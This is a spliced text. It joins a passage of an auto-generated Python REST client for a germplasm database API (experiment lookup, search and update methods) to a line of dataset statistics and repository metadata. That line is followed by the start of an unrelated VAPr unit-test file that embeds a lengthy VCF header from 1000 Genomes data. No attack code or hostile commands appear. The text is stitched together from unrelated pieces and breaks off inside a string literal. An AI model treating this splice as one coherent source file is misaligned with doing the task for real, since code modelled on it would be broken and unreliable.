def get_germplasm_experiments(self, uri, **kwargs): # noqa: E501
"""Get experiments where a germplasm has been used # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasm_experiments(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: germplasm URI (required)
:param str authorization: Authentication token (required)
:param str name: Regex pattern for filtering experiments by name
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[ExperimentGetListDTO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_germplasm_experiments_with_http_info(uri, **kwargs) # noqa: E501
else:
(data) = self.get_germplasm_experiments_with_http_info(uri, **kwargs) # noqa: E501
return data
def get_germplasm_experiments_with_http_info(self, uri, **kwargs): # noqa: E501
"""Get experiments where a germplasm has been used # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasm_experiments_with_http_info(uri, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str uri: germplasm URI (required)
:param str authorization: Authentication token (required)
:param str name: Regex pattern for filtering experiments by name
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[ExperimentGetListDTO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', 'name', 'order_by', 'page', 'page_size', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasm_experiments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uri' is set
if ('uri' not in params or
params['uri'] is None):
raise ValueError("Missing the required parameter `uri` when calling `get_germplasm_experiments`") # noqa: E501
if 'page' in params and params['page'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `get_germplasm_experiments`, must be a value greater than or equal to `0`") # noqa: E501
if 'page_size' in params and params['page_size'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `get_germplasm_experiments`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uri' in params:
path_params['uri'] = params['uri'] # noqa: E501
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
collection_formats['order_by'] = 'multi' # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/{uri}/experiments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ExperimentGetListDTO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_germplasms_by_uri(self, uris, **kwargs): # noqa: E501
"""Get a list of germplasms by their URIs # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasms_by_uri(uris, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] uris: Germplasms URIs (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: list[GermplasmGetAllDTO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_germplasms_by_uri_with_http_info(uris, **kwargs) # noqa: E501
else:
(data) = self.get_germplasms_by_uri_with_http_info(uris, **kwargs) # noqa: E501
return data
def get_germplasms_by_uri_with_http_info(self, uris, **kwargs): # noqa: E501
"""Get a list of germplasms by their URIs # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_germplasms_by_uri_with_http_info(uris, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] uris: Germplasms URIs (required)
:param str authorization: Authentication token (required)
:param str accept_language: Request accepted language
:return: list[GermplasmGetAllDTO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uris', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_germplasms_by_uri" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'uris' is set
if ('uris' not in params or
params['uris'] is None):
raise ValueError("Missing the required parameter `uris` when calling `get_germplasms_by_uri`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'uris' in params:
query_params.append(('uris', params['uris'])) # noqa: E501
collection_formats['uris'] = 'multi' # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm/by_uris', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GermplasmGetAllDTO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_germplasm(self, **kwargs): # noqa: E501
"""Search germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_germplasm(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param str uri: Regex pattern for filtering list by uri
:param str rdf_type: Search by type
:param str name: Regex pattern for filtering list by name and synonyms
:param str code: Regex pattern for filtering list by code
:param int production_year: Search by production year
:param str species: Search by species
:param str variety: Search by variety
:param str accession: Search by accession
:param str institute: Search by institute
:param str experiment: Search by experiment
:param str metadata: Search by metadata
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[GermplasmGetAllDTO]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.search_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def search_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""Search germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_germplasm_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param str uri: Regex pattern for filtering list by uri
:param str rdf_type: Search by type
:param str name: Regex pattern for filtering list by name and synonyms
:param str code: Regex pattern for filtering list by code
:param int production_year: Search by production year
:param str species: Search by species
:param str variety: Search by variety
:param str accession: Search by accession
:param str institute: Search by institute
:param str experiment: Search by experiment
:param str metadata: Search by metadata
:param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
:param int page: Page number
:param int page_size: Page size
:param str accept_language: Request accepted language
:return: list[GermplasmGetAllDTO]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['uri', 'rdf_type', 'name', 'code', 'production_year', 'species', 'variety', 'accession', 'institute', 'experiment', 'metadata', 'order_by', 'page', 'page_size', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_germplasm" % key
)
params[key] = val
del params['kwargs']
if 'page' in params and params['page'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page` when calling `search_germplasm`, must be a value greater than or equal to `0`") # noqa: E501
if 'page_size' in params and params['page_size'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `page_size` when calling `search_germplasm`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'uri' in params:
query_params.append(('uri', params['uri'])) # noqa: E501
if 'rdf_type' in params:
query_params.append(('rdf_type', params['rdf_type'])) # noqa: E501
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'code' in params:
query_params.append(('code', params['code'])) # noqa: E501
if 'production_year' in params:
query_params.append(('production_year', params['production_year'])) # noqa: E501
if 'species' in params:
query_params.append(('species', params['species'])) # noqa: E501
if 'variety' in params:
query_params.append(('variety', params['variety'])) # noqa: E501
if 'accession' in params:
query_params.append(('accession', params['accession'])) # noqa: E501
if 'institute' in params:
query_params.append(('institute', params['institute'])) # noqa: E501
if 'experiment' in params:
query_params.append(('experiment', params['experiment'])) # noqa: E501
if 'metadata' in params:
query_params.append(('metadata', params['metadata'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
collection_formats['order_by'] = 'multi' # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GermplasmGetAllDTO]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_germplasm(self, **kwargs): # noqa: E501
"""Update a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_germplasm(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param GermplasmUpdateDTO body: Germplasm description
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_germplasm_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.update_germplasm_with_http_info(**kwargs) # noqa: E501
return data
def update_germplasm_with_http_info(self, **kwargs): # noqa: E501
"""Update a germplasm # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_germplasm_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str authorization: Authentication token (required)
:param GermplasmUpdateDTO body: Germplasm description
:param str accept_language: Request accepted language
:return: ObjectUriResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', ] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_germplasm" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
#if 'authorization' in params:
# header_params['Authorization'] = params['authorization'] # noqa: E501
#if 'accept_language' in params:
# header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/core/germplasm', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectUriResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.341198 | 198 | 0.611945 | 5,185 | 45,558 | 5.165477 | 0.041659 | 0.057947 | 0.029832 | 0.024194 | 0.970952 | 0.965276 | 0.964007 | 0.957846 | 0.951574 | 0.945861 | 0 | 0.018542 | 0.29446 | 45,558 | 1,101 | 199 | 41.378747 | 0.814703 | 0.385772 | 0 | 0.828467 | 1 | 0.007299 | 0.190043 | 0.040209 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034672 | false | 0 | 0.007299 | 0 | 0.093066 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6db560c29b32d39044365e91738305d738b646bc | 51,808 | py | Python | VAPr/tests/test_vcf_merging.py | ucsd-ccbb/VAPr | 69b001e894bfc6a19077976ed3cd1dd3c88d21c9 | [
"MIT"
] | 30 | 2017-01-19T23:16:04.000Z | 2022-03-07T04:42:50.000Z | VAPr/tests/test_vcf_merging.py | ucsd-ccbb/VAPr | 69b001e894bfc6a19077976ed3cd1dd3c88d21c9 | [
"MIT"
] | 24 | 2017-06-07T23:32:36.000Z | 2021-06-22T20:31:05.000Z | VAPr/tests/test_vcf_merging.py | ucsd-ccbb/VAPr | 69b001e894bfc6a19077976ed3cd1dd3c88d21c9 | [
"MIT"
] | 3 | 2018-08-07T22:18:09.000Z | 2021-01-30T19:11:15.000Z | # standard libraries
import os
import tempfile
import unittest
# third-party libraries
import vcf
# project-specific libraries
import VAPr.vcf_merging as ns_test
def help_get_test_file_info():
base_dir = os.getcwd()
test_file_dir = os.path.join(base_dir, 'test_files/test_input_dir/G1000')
test_bgzipped_fps = [os.path.join(test_file_dir, "HG00096.vcf.gz"),
os.path.join(test_file_dir, "HG00097.vcf.gz")]
return test_file_dir, test_bgzipped_fps
class TestFunctions(unittest.TestCase):
HG00096_VCF_CONTENTS = """##fileformat=VCFv4.1
##FILTER=<ID=PASS,Description="All filters passed">
##fileDate=20150218
##reference=ftp://ftp.1000genomes.ebi.ac.uk//vol1/ftp/technical/reference/phase2_reference_assembly_sequence/hs37d5.fa.gz
##source=1000GenomesPhase3Pipeline
##contig=<ID=1,assembly=b37,length=249250621>
##contig=<ID=2,assembly=b37,length=243199373>
##contig=<ID=3,assembly=b37,length=198022430>
##contig=<ID=4,assembly=b37,length=191154276>
##contig=<ID=5,assembly=b37,length=180915260>
##contig=<ID=6,assembly=b37,length=171115067>
##contig=<ID=7,assembly=b37,length=159138663>
##contig=<ID=8,assembly=b37,length=146364022>
##contig=<ID=9,assembly=b37,length=141213431>
##contig=<ID=10,assembly=b37,length=135534747>
##contig=<ID=11,assembly=b37,length=135006516>
##contig=<ID=12,assembly=b37,length=133851895>
##contig=<ID=13,assembly=b37,length=115169878>
##contig=<ID=14,assembly=b37,length=107349540>
##contig=<ID=15,assembly=b37,length=102531392>
##contig=<ID=16,assembly=b37,length=90354753>
##contig=<ID=17,assembly=b37,length=81195210>
##contig=<ID=18,assembly=b37,length=78077248>
##contig=<ID=19,assembly=b37,length=59128983>
##contig=<ID=20,assembly=b37,length=63025520>
##contig=<ID=21,assembly=b37,length=48129895>
##contig=<ID=22,assembly=b37,length=51304566>
##contig=<ID=GL000191.1,assembly=b37,length=106433>
##contig=<ID=GL000192.1,assembly=b37,length=547496>
##contig=<ID=GL000193.1,assembly=b37,length=189789>
##contig=<ID=GL000194.1,assembly=b37,length=191469>
##contig=<ID=GL000195.1,assembly=b37,length=182896>
##contig=<ID=GL000196.1,assembly=b37,length=38914>
##contig=<ID=GL000197.1,assembly=b37,length=37175>
##contig=<ID=GL000198.1,assembly=b37,length=90085>
##contig=<ID=GL000199.1,assembly=b37,length=169874>
##contig=<ID=GL000200.1,assembly=b37,length=187035>
##contig=<ID=GL000201.1,assembly=b37,length=36148>
##contig=<ID=GL000202.1,assembly=b37,length=40103>
##contig=<ID=GL000203.1,assembly=b37,length=37498>
##contig=<ID=GL000204.1,assembly=b37,length=81310>
##contig=<ID=GL000205.1,assembly=b37,length=174588>
##contig=<ID=GL000206.1,assembly=b37,length=41001>
##contig=<ID=GL000207.1,assembly=b37,length=4262>
##contig=<ID=GL000208.1,assembly=b37,length=92689>
##contig=<ID=GL000209.1,assembly=b37,length=159169>
##contig=<ID=GL000210.1,assembly=b37,length=27682>
##contig=<ID=GL000211.1,assembly=b37,length=166566>
##contig=<ID=GL000212.1,assembly=b37,length=186858>
##contig=<ID=GL000213.1,assembly=b37,length=164239>
##contig=<ID=GL000214.1,assembly=b37,length=137718>
##contig=<ID=GL000215.1,assembly=b37,length=172545>
##contig=<ID=GL000216.1,assembly=b37,length=172294>
##contig=<ID=GL000217.1,assembly=b37,length=172149>
##contig=<ID=GL000218.1,assembly=b37,length=161147>
##contig=<ID=GL000219.1,assembly=b37,length=179198>
##contig=<ID=GL000220.1,assembly=b37,length=161802>
##contig=<ID=GL000221.1,assembly=b37,length=155397>
##contig=<ID=GL000222.1,assembly=b37,length=186861>
##contig=<ID=GL000223.1,assembly=b37,length=180455>
##contig=<ID=GL000224.1,assembly=b37,length=179693>
##contig=<ID=GL000225.1,assembly=b37,length=211173>
##contig=<ID=GL000226.1,assembly=b37,length=15008>
##contig=<ID=GL000227.1,assembly=b37,length=128374>
##contig=<ID=GL000228.1,assembly=b37,length=129120>
##contig=<ID=GL000229.1,assembly=b37,length=19913>
##contig=<ID=GL000230.1,assembly=b37,length=43691>
##contig=<ID=GL000231.1,assembly=b37,length=27386>
##contig=<ID=GL000232.1,assembly=b37,length=40652>
##contig=<ID=GL000233.1,assembly=b37,length=45941>
##contig=<ID=GL000234.1,assembly=b37,length=40531>
##contig=<ID=GL000235.1,assembly=b37,length=34474>
##contig=<ID=GL000236.1,assembly=b37,length=41934>
##contig=<ID=GL000237.1,assembly=b37,length=45867>
##contig=<ID=GL000238.1,assembly=b37,length=39939>
##contig=<ID=GL000239.1,assembly=b37,length=33824>
##contig=<ID=GL000240.1,assembly=b37,length=41933>
##contig=<ID=GL000241.1,assembly=b37,length=42152>
##contig=<ID=GL000242.1,assembly=b37,length=43523>
##contig=<ID=GL000243.1,assembly=b37,length=43341>
##contig=<ID=GL000244.1,assembly=b37,length=39929>
##contig=<ID=GL000245.1,assembly=b37,length=36651>
##contig=<ID=GL000246.1,assembly=b37,length=38154>
##contig=<ID=GL000247.1,assembly=b37,length=36422>
##contig=<ID=GL000248.1,assembly=b37,length=39786>
##contig=<ID=GL000249.1,assembly=b37,length=38502>
##contig=<ID=MT,assembly=b37,length=16569>
##contig=<ID=NC_007605,assembly=b37,length=171823>
##contig=<ID=X,assembly=b37,length=155270560>
##contig=<ID=Y,assembly=b37,length=59373566>
##contig=<ID=hs37d5,assembly=b37,length=35477943>
##ALT=<ID=CNV,Description="Copy Number Polymorphism">
##ALT=<ID=DEL,Description="Deletion">
##ALT=<ID=DUP,Description="Duplication">
##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">
##ALT=<ID=INS:ME:LINE1,Description="Insertion of LINE1 element">
##ALT=<ID=INS:ME:SVA,Description="Insertion of SVA element">
##ALT=<ID=INS:MT,Description="Nuclear Mitochondrial Insertion">
##ALT=<ID=INV,Description="Inversion">
##ALT=<ID=CN0,Description="Copy number allele: 0 copies">
##ALT=<ID=CN1,Description="Copy number allele: 1 copy">
##ALT=<ID=CN2,Description="Copy number allele: 2 copies">
##ALT=<ID=CN3,Description="Copy number allele: 3 copies">
##ALT=<ID=CN4,Description="Copy number allele: 4 copies">
##ALT=<ID=CN5,Description="Copy number allele: 5 copies">
##ALT=<ID=CN6,Description="Copy number allele: 6 copies">
##ALT=<ID=CN7,Description="Copy number allele: 7 copies">
##ALT=<ID=CN8,Description="Copy number allele: 8 copies">
##ALT=<ID=CN9,Description="Copy number allele: 9 copies">
##ALT=<ID=CN10,Description="Copy number allele: 10 copies">
##ALT=<ID=CN11,Description="Copy number allele: 11 copies">
##ALT=<ID=CN12,Description="Copy number allele: 12 copies">
##ALT=<ID=CN13,Description="Copy number allele: 13 copies">
##ALT=<ID=CN14,Description="Copy number allele: 14 copies">
##ALT=<ID=CN15,Description="Copy number allele: 15 copies">
##ALT=<ID=CN16,Description="Copy number allele: 16 copies">
##ALT=<ID=CN17,Description="Copy number allele: 17 copies">
##ALT=<ID=CN18,Description="Copy number allele: 18 copies">
##ALT=<ID=CN19,Description="Copy number allele: 19 copies">
##ALT=<ID=CN20,Description="Copy number allele: 20 copies">
##ALT=<ID=CN21,Description="Copy number allele: 21 copies">
##ALT=<ID=CN22,Description="Copy number allele: 22 copies">
##ALT=<ID=CN23,Description="Copy number allele: 23 copies">
##ALT=<ID=CN24,Description="Copy number allele: 24 copies">
##ALT=<ID=CN25,Description="Copy number allele: 25 copies">
##ALT=<ID=CN26,Description="Copy number allele: 26 copies">
##ALT=<ID=CN27,Description="Copy number allele: 27 copies">
##ALT=<ID=CN28,Description="Copy number allele: 28 copies">
##ALT=<ID=CN29,Description="Copy number allele: 29 copies">
##ALT=<ID=CN30,Description="Copy number allele: 30 copies">
##ALT=<ID=CN31,Description="Copy number allele: 31 copies">
##ALT=<ID=CN32,Description="Copy number allele: 32 copies">
##ALT=<ID=CN33,Description="Copy number allele: 33 copies">
##ALT=<ID=CN34,Description="Copy number allele: 34 copies">
##ALT=<ID=CN35,Description="Copy number allele: 35 copies">
##ALT=<ID=CN36,Description="Copy number allele: 36 copies">
##ALT=<ID=CN37,Description="Copy number allele: 37 copies">
##ALT=<ID=CN38,Description="Copy number allele: 38 copies">
##ALT=<ID=CN39,Description="Copy number allele: 39 copies">
##ALT=<ID=CN40,Description="Copy number allele: 40 copies">
##ALT=<ID=CN41,Description="Copy number allele: 41 copies">
##ALT=<ID=CN42,Description="Copy number allele: 42 copies">
##ALT=<ID=CN43,Description="Copy number allele: 43 copies">
##ALT=<ID=CN44,Description="Copy number allele: 44 copies">
##ALT=<ID=CN45,Description="Copy number allele: 45 copies">
##ALT=<ID=CN46,Description="Copy number allele: 46 copies">
##ALT=<ID=CN47,Description="Copy number allele: 47 copies">
##ALT=<ID=CN48,Description="Copy number allele: 48 copies">
##ALT=<ID=CN49,Description="Copy number allele: 49 copies">
##ALT=<ID=CN50,Description="Copy number allele: 50 copies">
##ALT=<ID=CN51,Description="Copy number allele: 51 copies">
##ALT=<ID=CN52,Description="Copy number allele: 52 copies">
##ALT=<ID=CN53,Description="Copy number allele: 53 copies">
##ALT=<ID=CN54,Description="Copy number allele: 54 copies">
##ALT=<ID=CN55,Description="Copy number allele: 55 copies">
##ALT=<ID=CN56,Description="Copy number allele: 56 copies">
##ALT=<ID=CN57,Description="Copy number allele: 57 copies">
##ALT=<ID=CN58,Description="Copy number allele: 58 copies">
##ALT=<ID=CN59,Description="Copy number allele: 59 copies">
##ALT=<ID=CN60,Description="Copy number allele: 60 copies">
##ALT=<ID=CN61,Description="Copy number allele: 61 copies">
##ALT=<ID=CN62,Description="Copy number allele: 62 copies">
##ALT=<ID=CN63,Description="Copy number allele: 63 copies">
##ALT=<ID=CN64,Description="Copy number allele: 64 copies">
##ALT=<ID=CN65,Description="Copy number allele: 65 copies">
##ALT=<ID=CN66,Description="Copy number allele: 66 copies">
##ALT=<ID=CN67,Description="Copy number allele: 67 copies">
##ALT=<ID=CN68,Description="Copy number allele: 68 copies">
##ALT=<ID=CN69,Description="Copy number allele: 69 copies">
##ALT=<ID=CN70,Description="Copy number allele: 70 copies">
##ALT=<ID=CN71,Description="Copy number allele: 71 copies">
##ALT=<ID=CN72,Description="Copy number allele: 72 copies">
##ALT=<ID=CN73,Description="Copy number allele: 73 copies">
##ALT=<ID=CN74,Description="Copy number allele: 74 copies">
##ALT=<ID=CN75,Description="Copy number allele: 75 copies">
##ALT=<ID=CN76,Description="Copy number allele: 76 copies">
##ALT=<ID=CN77,Description="Copy number allele: 77 copies">
##ALT=<ID=CN78,Description="Copy number allele: 78 copies">
##ALT=<ID=CN79,Description="Copy number allele: 79 copies">
##ALT=<ID=CN80,Description="Copy number allele: 80 copies">
##ALT=<ID=CN81,Description="Copy number allele: 81 copies">
##ALT=<ID=CN82,Description="Copy number allele: 82 copies">
##ALT=<ID=CN83,Description="Copy number allele: 83 copies">
##ALT=<ID=CN84,Description="Copy number allele: 84 copies">
##ALT=<ID=CN85,Description="Copy number allele: 85 copies">
##ALT=<ID=CN86,Description="Copy number allele: 86 copies">
##ALT=<ID=CN87,Description="Copy number allele: 87 copies">
##ALT=<ID=CN88,Description="Copy number allele: 88 copies">
##ALT=<ID=CN89,Description="Copy number allele: 89 copies">
##ALT=<ID=CN90,Description="Copy number allele: 90 copies">
##ALT=<ID=CN91,Description="Copy number allele: 91 copies">
##ALT=<ID=CN92,Description="Copy number allele: 92 copies">
##ALT=<ID=CN93,Description="Copy number allele: 93 copies">
##ALT=<ID=CN94,Description="Copy number allele: 94 copies">
##ALT=<ID=CN95,Description="Copy number allele: 95 copies">
##ALT=<ID=CN96,Description="Copy number allele: 96 copies">
##ALT=<ID=CN97,Description="Copy number allele: 97 copies">
##ALT=<ID=CN98,Description="Copy number allele: 98 copies">
##ALT=<ID=CN99,Description="Copy number allele: 99 copies">
##ALT=<ID=CN100,Description="Copy number allele: 100 copies">
##ALT=<ID=CN101,Description="Copy number allele: 101 copies">
##ALT=<ID=CN102,Description="Copy number allele: 102 copies">
##ALT=<ID=CN103,Description="Copy number allele: 103 copies">
##ALT=<ID=CN104,Description="Copy number allele: 104 copies">
##ALT=<ID=CN105,Description="Copy number allele: 105 copies">
##ALT=<ID=CN106,Description="Copy number allele: 106 copies">
##ALT=<ID=CN107,Description="Copy number allele: 107 copies">
##ALT=<ID=CN108,Description="Copy number allele: 108 copies">
##ALT=<ID=CN109,Description="Copy number allele: 109 copies">
##ALT=<ID=CN110,Description="Copy number allele: 110 copies">
##ALT=<ID=CN111,Description="Copy number allele: 111 copies">
##ALT=<ID=CN112,Description="Copy number allele: 112 copies">
##ALT=<ID=CN113,Description="Copy number allele: 113 copies">
##ALT=<ID=CN114,Description="Copy number allele: 114 copies">
##ALT=<ID=CN115,Description="Copy number allele: 115 copies">
##ALT=<ID=CN116,Description="Copy number allele: 116 copies">
##ALT=<ID=CN117,Description="Copy number allele: 117 copies">
##ALT=<ID=CN118,Description="Copy number allele: 118 copies">
##ALT=<ID=CN119,Description="Copy number allele: 119 copies">
##ALT=<ID=CN120,Description="Copy number allele: 120 copies">
##ALT=<ID=CN121,Description="Copy number allele: 121 copies">
##ALT=<ID=CN122,Description="Copy number allele: 122 copies">
##ALT=<ID=CN123,Description="Copy number allele: 123 copies">
##ALT=<ID=CN124,Description="Copy number allele: 124 copies">
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">
##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">
##INFO=<ID=CS,Number=1,Type=String,Description="Source call set.">
##INFO=<ID=END,Number=1,Type=Integer,Description="End coordinate of this variant">
##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">
##INFO=<ID=MC,Number=.,Type=String,Description="Merged calls.">
##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END<POLARITY; If there is only 5' OR 3' support for this call, will be NULL NULL for START and END">
##INFO=<ID=MEND,Number=1,Type=Integer,Description="Mitochondrial end coordinate of inserted sequence">
##INFO=<ID=MLEN,Number=1,Type=Integer,Description="Estimated length of mitochondrial insert">
##INFO=<ID=MSTART,Number=1,Type=Integer,Description="Mitochondrial start coordinate of inserted sequence">
##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="SV length. It is only calculated for structural variation MEIs. For other types of SVs; one may calculate the SV length by INFO:END-START+1, or by finding the difference between lengthes of REF and ALT alleles">
##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">
##INFO=<ID=TSD,Number=1,Type=String,Description="Precise Target Site Duplication for bases, if unknown, value will be NULL">
